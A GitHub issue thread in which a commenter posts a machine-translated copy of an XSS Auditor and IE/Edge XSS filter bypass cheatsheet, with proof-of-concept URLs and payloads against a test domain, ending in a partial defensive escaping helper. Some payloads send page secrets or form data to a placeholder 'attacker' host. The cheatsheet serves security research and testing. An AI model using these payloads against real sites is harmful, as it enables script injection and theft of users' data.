English version? #2

Open
qazbnm456 opened this issue Sep 14, 2017 · 8 comments

Comments

@qazbnm456

Hi @masatokinugawa, thanks for your sharing. It's pretty neat! However, I just want to know do you have any plan offering the English version as well? It would be great if we can have one. 😄

@masatokinugawa
Owner

Hi @qazbnm456! I am thinking that I want to provide English version, but I couldn't make time so far :(

Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks!

@qazbnm456
Author

Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄

@qazbnm456
Author

@Auxy233 Nice, I can't wait to see it. Really appreciate. 👍

@qazbnm456
Author

@Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently.

@jcubic

jcubic commented Jan 12, 2018

Any progress?

@EdOverflow

Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses.

@w1redch4d

w1redch4d commented Jan 10, 2023

here is a Google-translated markdown for y'all who need it:

This page summarizes XSS Auditor and XSS filter bypass. Content that runs on the latest versions of Chrome/Safari and IE11/Edge is eligible.
If you're a vulnerability diagnostician, let us help you convincingly prove that an attack is possible, and if you're a security researcher, help us find more bypasses.
What I'm listing is what can be bypassed in common situations. Just because a method isn't listed here doesn't mean it can't be abused in real-world situations. Regardless of whether it can be bypassed or not, it's always a good idea to do some underlying XSS mitigation.

Table of contents

XSS Auditor

What is not blocked

In contexts where protection is not provided in the first place, scripts can be executed without special manipulation.

XSS happening in string literals

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//

<script>var q="";alert(1)//"</script>

XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)

https://vulnerabledoma.in/bypass/link?q=javascript:alert(1)

<a href="javascript:alert(1)">Link</a>

If you have more than one injection point

(Although it appears that a significant number of cases with more than one injection point could be screened out, the previously reported cases ([#96616](https://bugs.chromium.org/p/chromium/issues/detail?id=96616), #403636) are WontFix, so this is classified as not blocked.)

https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60

<div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>

if replaced

https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E

<script>/&/-alert(1)</script><script>/&amp;/-alert(1)</script>

DOM based XSS other than document.write() the request string

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS in XML pages

https://vulnerabledoma.in/bypass/xml?q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script></html>

Bypass also occurs when a string can be written from the top of the page, Content-Type is not specified correctly, and XML is selected by Content Sniffing.

https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

<?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>

The following do not lead to script execution, but they can be written and have the potential to be used for attacks to some extent.

http(s): create link

https://vulnerabledoma.in/bypass/text?q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3E

<a href=https://attacker/>Session expired. Please login again.</a>

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Arbitrary CSS description

In addition to disguising the appearance of the page, if the same page contains sensitive information, it may be possible to retrieve the information using only CSS. See URL for details.

Reference URL:

https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E

<style>@import '//attacker/test.css'</style>

https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E

<link rel=stylesheet href=//attacker/test.css>

Bypass

Using the values attribute for SVG animations (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink:href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E%3C/a%3E

<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" values="&#x3000;javascript:alert(1)"/><a id=x><rect width=100 height=100 /></a>

Using multiple null characters (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A null byte is printed
  3. No preceding whitespace character

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E

[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>

Using comments with --> in script tags (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is a closing tag of the script tag without a line break after it

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E

<div><script>alert(1)
--></div><script src=/test.js></script>

Using half-baked base tags (Safari only)

Using Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after it, or no ' or " follows it
  3. Flash can be used in the target environment

Reference URL:

PoCs:

(If there is no space immediately after) https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm/

<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>

(If there is a white space immediately after) https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0.cm/

<div> <embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/ </div><div id="x"></div>

Using scripts loaded with relative URLs

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no space immediately after it, or no ' or " follows it
  3. After that, there is a part that loads the script with a relative URL

PoCs:

https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/

<div><base href=//cors.l0.cm/</div><script src=/test.js></script>

Use of ISO-2022-JP escape sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is no character code specification on the page

supplement:

In ISO-2022-JP HTML, the byte strings [0x1B](B, [0x1B](H and [0x1B](J are ignored, so one of them is inserted between the characters of a string the filter reacts to. Also, in Chrome/Safari a byte string such as [0x1B]$@[0x0A] is treated the same as [0x0A], but the XSS Auditor cannot interpret it well, which bypasses it.

Reference URL:

PoCs:

<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>

(*Because the $ sign is arbitrarily encoded and does not work as intended, the redirect is sandwiched by a method that includes a $.)

<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>

Using resources from the same domain

XSS Auditor does not block loading same-domain resources that do not have queries. Bypassing is possible in some cases if the resources necessary for an attack can be placed in the same domain.

Cases with XSS in the path (Chrome only)

Conditions for attacking:

  1. XSS that can write arbitrary tags is in the path
  2. Doesn't require a query to display the page

PoCs:

https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E

PATH_INFO:/<link rel=import href="/bypass/path/<script>alert(1)</script>">

File Upload Feature

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Hosting user-uploaded files on the same origin

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E

<script src=/bypass/usercontent/xss.js></script>

(Chrome only)
https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E

<link rel=import href=/bypass/usercontent/icon.jpg>

Using Flash and flashvars

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin that passes an unescaped parameter string to ExternalInterface.call()
  3. Flash can be used in the target environment

supplement:

By using the flashvars attribute, you can pass parameters without having to pass Flash parameters directly in the query. (= On the Flash side, even if passing parameters from the URL is restricted as a countermeasure against XSS by opening the Flash directly, they can still be passed with flashvars.) It can also be used to bypass CSP, such as when there is a CSP like `Content-Security-Policy: default-src 'self'`.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\%22)-(alert=alert(1)))}catch(e){}//%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

<embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "('" + eventName + "'," + eventValues + ")", 0);

Using ExternalInterface.objectID and ExternalInterface.call() in Flash

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. There is Flash in the same origin where ExternalInterface.objectID is passed to ExternalInterface.call()
  3. Flash can be used in the target environment

supplement:

ExternalInterface.objectID is a property set to the value of the name attribute of the tag used for embedding. Although it cannot cause XSS by itself, it can be used for bypass purposes. It can also be used to bypass CSP when there are CSP restrictions such as Content-Security-Policy: default-src 'self'.

PoCs:

https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

<embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

ExternalInterface.call(ExternalInterface.objectID + '_init');

Using Angular

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Angular or loads Angular from a CORS-enabled CDN

supplement:

Angular will try to expand the template enclosed in {{}} inside the tag with the attribute ng-app. Templates can run scripts.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}

<script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}

If you have a page on the same origin that loads Angular from a CORS-enabled CDN, you can load resources from external origins by indirectly loading them from HTML Imports.

(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}

<link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}

Using Vue.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts Vue.js or loads from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}}

<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}

Using jQuery

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts jQuery or loads jQuery from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute jQuery additional functions for the crafted form tag

supplement:

jQuery's additional functions are after, before, prepend, append, html, replaceWith, wrap, wrapAll, insertBefore, insertAfter, prependTo, appendTo and the like. By using a form element containing an input whose name attribute is ownerDocument, the reference destination of Node.ownerDocument is misled, and the script is executed when it should not be. In addition, there is processing that removes <!-- from the script block before execution; combined with the fact that the Auditor does not intercept script blocks that contain only comments, this causes the bypass.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?type=5&q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E

<!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-3.2.1.min.js"></script>
<script>
$(document).ready(function(){
     // code taken from http://api.jquery.com/after/
     $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
<!-- XSS -->
<form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
<!-- XSS -->
<p class="container"></p>
</body>
<!-- Inspired by @sirdarckcat CSP bypass trick: https://sirdarckcat.github.io/csp/jquery.html -->
</html>

(This example is Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/jquery.html%3E%3Cp%20class=container%3E%3C/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E

<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><!--alert(1)</script></form>

Using underscore.js

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. A page on the same origin that hosts underscore.js or loads it from a CORS-enabled CDN
  3. There is a script on the page or on the same origin that can execute template expansion for specially crafted script tags

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/underscore.html%3E%3Cscript%20id=template%3E//%3C%alert1%%3E%3C/script%3E

<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>

Using JSX transformation scripts such as JSXTransformer/babel-standalone

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Pages on the same origin that host JSX transformation scripts such as JSXTransformer.js or load them from a CORS-enabled CDN

supplement:

This takes advantage of the transformation script parsing SVG script blocks in the same way as HTML script blocks. The comment part between <!-- and -->, which is normally not executed, is evaluated as a script.

PoCs:

(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E

<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<!--
alert(1)//--></svg><script>0</script>

Using half-baked tags with document.write() (Chrome only)

Conditions for attacking:

  1. There is XSS where the URL is passed to document.write()
  2. The tag used for the attack can be closed outside the document.write() (in the PoC below, </body> is used as the closing tag)

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)//

<body>
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
</body>

Using half-baked form tags (getting information only) (Safari only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. New form tags can be placed where existing form content containing sensitive information can be submitted.

Reference URL:

PoCs:

(if you are inside a form) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/

<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

(when outside the form) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/

<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>

Past bypass

Posted in Fixed Bypass Archive.

IE/Edge XSS filter

What is not blocked

XSS happening in string literals

supplement:

Previously there was a blocking condition for string literals. Although it partially remains, clearly attackable things such as assignment to location, which was blocked before, are now allowed, and there is almost no protection. It doesn't look like it is going to provide protection any more, so I've categorized it as non-blocking rather than as a bypass.

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//

<script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>

All DOM based XSS

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E

<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>

XSS with more than one injection point on one page

https://vulnerabledoma.in/bypass/text?type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22

<div>"src=data:,alert%281%29></script><script x="</div>
<div>"src=data:,alert%281%29></script><script x="</div>

If there is string manipulation

When some strings are removed or replaced, intervening strings do not block.

If deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>

if replaced

If, at a position represented by . in the filter's regular expression, a replacement expands the string beyond the width that . can match, it can no longer be blocked.

In the following case, to avoid matching the blocking condition <sc{r}ipt.*?>, the behavior of & being replaced excessively is used. / is a wildcard of 0-3 characters and & is a wildcard of 0-5 characters, so the maximum width that can be blocked is 8 characters. The string length of /&amp;amp; in the output after replacement is 10 characters, which exceeds the width of 8 characters, so it cannot be blocked.

PoCs:

https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E

<script/&>alert(1)</script><script/&amp;amp;>alert(1)</script>

The following do not lead to script execution, but they can be written and have the potential to be used for attacks to some extent.

Tags that can send requests to the outside

It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>

Bypass

Using strings disguised as XML namespaces (Edge only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Flash is enabled in the target environment
  3. No X-XSS-Protection: 1; mode=block header

supplement:

Edge will also try to block tags with an XML namespace. If a character string such as <embed/:script is used in normal HTML, it will be interpreted as a script tag when it should be interpreted as an embed tag, and blocking will fail. Since the blocking action has happened, the bypass will fail if the X-XSS-Protection: 1; mode=block header is present.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E

<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>

Using HZ-GB-2312 Escape Sequences

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing character code specification in Content-Type header

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

<x~
onfocus=alert(1) id=a tabindex=0>

Using encoding behavior when navigating

Conditions for attacking:

  1. Reflected XSS via GET

supplement:

During navigation, IE/Edge encodes the query string with the character code of the page before navigation and sends the request. At this time, the XSS filter was (presumably) checking the encoded string itself rather than the request being sent, which can cause a mismatch between the encoded string and the bytes actually sent; a bypass occurs when they differ.

A specific example is shown with the character code x-chinese-cns used in the PoC below. In x-chinese-cns the character 旡 is mapped to 0xA13E. A query <script/旡 containing this string is sent from a page that has x-chinese-cns set as its character code, attached to a parameter with reflected XSS. Then the request sent contains not the UTF-8 representation of 旡 but the bytes encoded in x-chinese-cns, </script/0xA1> (0x3E is >), so a <script> tag is written into the page. Normally, if a <script> tag is written, the XSS filter should work, but it doesn't here. The presumed reason is that the filter mistakenly saw the string <script/旡 and did not match the blocking condition <sc{r}ipt.*?>.

Reference URL:

PoCs:

<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/text?q=<script/旡alert(1)<\/script/"
</script>

(For XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html

<meta charset=utf-8>
<script>
   document.charset="x-chinese-cns";
   location="https://vulnerabledoma.in/bypass/attribute?q=乜onmouseover=alert(1)//"
</script>

As with other character codes, a mismatch between the encoded string and the bytes actually sent can be bypassed.

(The following was reproduced in an environment where the system locale is Japanese, but was not reproduced in an environment with German language settings. It seems the operating principle is slightly different from the other vectors, but I do not know the exact principle. It is published for reference.)

Using the Adobe Acrobat Reader plug-in (IE only)

Conditions for attacking:

  1. There is XSS via POST request
  2. Target uses Adobe Acrobat Reader plugin

Reference URL:

PoCs:

https://l0.cm/bypass/ie_postxss_bypass.pdf

%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 33 0 R
/AcroForm 22 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annots [23 0 R]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

33 0 obj
<<
/S /SubmitForm
/F
         <<
         %URL TO SUBMIT TO:
         /F (https://vulnerabledoma.in/bypass/text)
         /FS /URL
         >>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj

22 0 obj
<<
     /Fields [23 0 R]
>>
endobj
23 0 obj
<<
     /DA (/Helv 12 Tf 0g)
     /F 4
     /FT /Tx
     /Rect [ 9.526760 680.078003 297.527008 702.078003 ]
     /Subtype /Widget
     /Type /Annot
     % PARAMETER NAME
     /T (q)
     % PARAMETER PAYLOAD
     /V (<script>alert\(1\)</script>)
     /P 4 0 R
>>
endobj
trailer
<<
/Root 1 0 R
>>

Using Content Sniffing for XML (IE only)

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. Missing X-Content-Type-Options:nosniff
  3. String from top of page

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E

<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1&#x29;</x:script>

Using UTF-7 BOM (IE only)

Conditions for attacking:

  1. Character strings can be written from the top of the page
  2. Symbols such as +, /, and - are allowed

supplement:

+/v8, +/v9, +/v+, +/v/ are UTF-7 [BOM](https://ja.wikipedia.org/wiki/%E3%83%90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC%E3%82%AF)s. In IE, if this string appears at the top of the page, the character code of the page is assumed to be UTF-7.
Even if the character code is specified in the page, if the page is reopened via history.back(), the character code of that page will be treated as UTF-7. (Although the latter behavior was reported to Microsoft in July 2013, no changes have been made to date.)

PoCs:

(If there is no character code specified on the page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-

+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-

(If the page has character code specification) https://l0.cm/bypass/ie_utf7.html

<script>
function go(){
   window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(location)%2BADw-/script%2BAD4-&charset=utf-8", "a");
   setTimeout(function(){window.open("https://l0.cm/h_back.html","a")},1000);
}
</script>
<button onclick=go()>go</button>

Using <?PXML> (IE only)

Conditions for attacking:

  1. Reflected XSS
  2. Three or more < do not appear before the injection point
  3. The document mode of the page is set to 9 or less, or you can set the document mode to 9 or less by embedding in a frame, etc.

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<?PXML><html:script>alert(1)</html:script>

https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

<PXML><html:script>alert(1)</html:script>

Using referrers

IE/Edge's XSS filter does not work in cases with a Referer header from the same domain (including subdomains) or localhost. Bypassing is possible if such a referrer can be attached.

Use of link functions within the same domain (including subdomains)

Conditions for attacking:

  1. Reflected XSS
  2. Create links to XSS pages on the same domain (including subdomains)

PoCs:

<a href="https://vulnerabledoma.in/bypass/text?q=<script>alert(1)</script>">Click HERE</a>

Bypass where arbitrary URL can be specified

Conditions for attacking:

  1. There are places where reflective XSS is possible in the link

supplement:

By double linking the vulnerable part and adding a referrer, you can create a link to a javascript: URL without triggering the XSS filter.

PoCs:

https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)

<a href="?q=javascript%3Aalert(1)">Link</a>

If the state before submission to the vulnerable form can be maintained on the page

Conditions for attacking:

  1. Reflected XSS
  2. The state before submission to the vulnerable form can be maintained on the page of the same domain (including subdomains).

PoCs:

https://vulnerabledoma.in/bypass/form?q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B/script%3E

<form action="form">
<input type="hidden" name="q" value="&#x22;>&#x3C;script>alert&#x28;1)&#x3C;/script>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Using option tags

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The XSS is inside an existing form

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B/script%3E

<form action=submit>
<button formaction=form3>CLICK<select name=q><option>&lt;script>alert(1)&lt;/script>
</form>

Using an empty iframe

Conditions for attacking:

  1. There is XSS that can write arbitrary tags
  2. The page allows embedding in frames

supplement:

Creating an empty iframe with XSS and navigating a scripted URL to that frame causes a bypass due to the referrer of the vulnerable domain itself.

Reference URL:

PoCs:

https://l0.cm/bypass/ieedge_iframe.html

<!-- Found by @magicmac2000 -->
<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text?q=%3Ciframe%3E"></iframe>

Using formaction (getting information only)

Conditions for attacking:

  1. Reflected XSS
  2. You can write a new formaction attribute where you can submit an existing form content containing sensitive information.

PoCs:

https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/%3E

<form action="form">
<input type="hidden" name="q" value=""><button formaction=//attacker/>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>

Use of character-referenced strings in style (style description only)

Conditions for attacking:

  1. Reflected XSS
  2. Attackable with CSS

supplement:

Entity-reference notation for characters such as @, :, \ and ( that are part of a string the filter reacts to is not considered, so a bypass occurs in SVG style blocks and attribute values where entity-reference notation is allowed.
In IE, in addition to attacks that read information with CSS, in some cases scripts can be executed via behavior:url().

Reference URL:

PoCs:

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport'//attacker'%3C/style%3E

<svg><style>&commat;import'//attacker'</style>

https://vulnerabledoma.in/bypass/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27//attacker%27%3C/style%3E

<svg><style>@&bsol;0069mport'//attacker'</style>

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior&colon;url('/bypass/usercontent/xss.txt')">

(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10

<p style="behavior:url&lpar;'/bypass/usercontent/xss.txt')">

Past bypass

Published on Fixed Bypass Archive.
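An added example, not code from the cheatsheet, its author, or anyone in this thread: two server-side helpers (Node.js, names are mine) that close the first "what is not blocked" cases listed in the translation above, a value reflected into a JavaScript string literal and a location.href sink fed from the URL, which no filter ever covered.

```javascript
// Added example (not from the cheatsheet or this thread). Node.js helpers
// for the cases the Auditor/XSS filter never protected; names are my own.

// Case 1: a value reflected into a JavaScript string literal inside <script>.
// The cheatsheet's PoC  q=";alert(1)//  yields  var q="";alert(1)//"
// Every character that could end the literal, the line, or the <script>
// block is hex/unicode-escaped, so the reflected value stays data.
const JS_STRING_ESCAPES = {
  '"': '\\x22', "'": '\\x27', '\\': '\\\\', '/': '\\/',
  '<': '\\x3c', '>': '\\x3e', '&': '\\x26',
  '\n': '\\n', '\r': '\\r', '\0': '\\x00',
  '\u2028': '\\u2028', '\u2029': '\\u2029'
};

function jsStringLiteral(value) {
  const body = String(value).replace(/["'\\\/<>&\n\r\0\u2028\u2029]/g,
    ch => JS_STRING_ESCAPES[ch]);
  return '"' + body + '"';
}

// The str_literal page from the cheatsheet, rendered with the encoder.
function renderScriptBlock(q) {
  return '<script>var q=' + jsStringLiteral(q) + ';</script>';
}

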